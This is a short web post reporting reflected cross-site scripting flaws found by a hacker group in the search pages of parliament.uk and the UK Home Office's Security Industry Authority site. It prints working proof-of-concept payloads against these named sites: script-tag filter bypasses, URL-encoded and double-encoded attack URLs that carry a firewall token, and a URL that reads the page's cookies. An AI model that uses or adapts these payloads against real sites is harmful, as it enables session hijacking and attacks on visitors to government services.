4tt4ck3r Finds Flaw in UK Government Websites

Iranian hacker 4tt4ck3r has previously found Reflected XSS -Cross Site Scripting- vulnerabilities in government websites of the UK as follows :

Parliament of the United Kingdom

The vulnerable website address is : https://www.parliament.uk/search/results/
The URL of website changed to this type : https://www.parliament.uk/search/results/?q=HellO -or other choice-

XSS scripts can be run with different bypass methods of this vulnerability. The ‘head’ bypass method and ‘Encoding’ the script would look like:

“>head<script>alert(‘HellO’)</script>head”>”

The Encoded script would look like :

%22%3E%68%65%61%64%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%27%48%65%6C%
6C%4F%27%29%3C%2F%73%63%72%69%70%74%3E%68%65%61%64%22%3E%22%00

The Encoded script on this website would look like :

https://www.parliament.uk/search/results/?q=%2522%253E%2568%2565%2561%2564%253C%2573%2563%2572%2569%2570%2574%253E%
2561%256C%2565%2572%2574%2528%2527%2548%2565%256C%256C%254F%2527%2529%253C%252F%
2573%2563%2572%2569%2570%2574%253E%2568%2565%2561%2564
%2522%253E%2522%2500&__cf_waf_tk__=007990002B2cYZgm1bcmnxNL4Ep2na0Wa66k

Find details of the vulnerability here

The Security Industry Authority -SIA- of United Kingdom Home Office

The vulnerable page of this website is : http://www.sia.homeoffice.gov.uk/Pages/SearchResults.aspx

The URL of website can be changed like this example : http://www.sia.homeoffice.gov.uk/Pages/SearchResults.aspx?Search=4TT4CK3R
Running the script on this website would be :

http://www.sia.homeoffice.gov.uk/Pages/SearchResults.aspx?Search=%22%22/%3Ehead%3Cscript%3Ealert%28%274TT4CK3R%27%29%3C/script%3Ehead%3C/%22%22

This website also enables capture of the cookies as follows :

http://www.sia.homeoffice.gov.uk/Pages/SearchResults.aspx?Search=%22%22/%3Ehead%3Cscript%3Ealert%28document.cookie%29%3C/script%3Ehead%3C/%22%22

Find details of the vulnerability here
The vulnerability was discovered by : Dark Killer and the team is : Dark Killer , 4TT4CK3R , RxM_BR , Sina Titan

Leave a Reply

Your email address will not be published. Required fields are marked *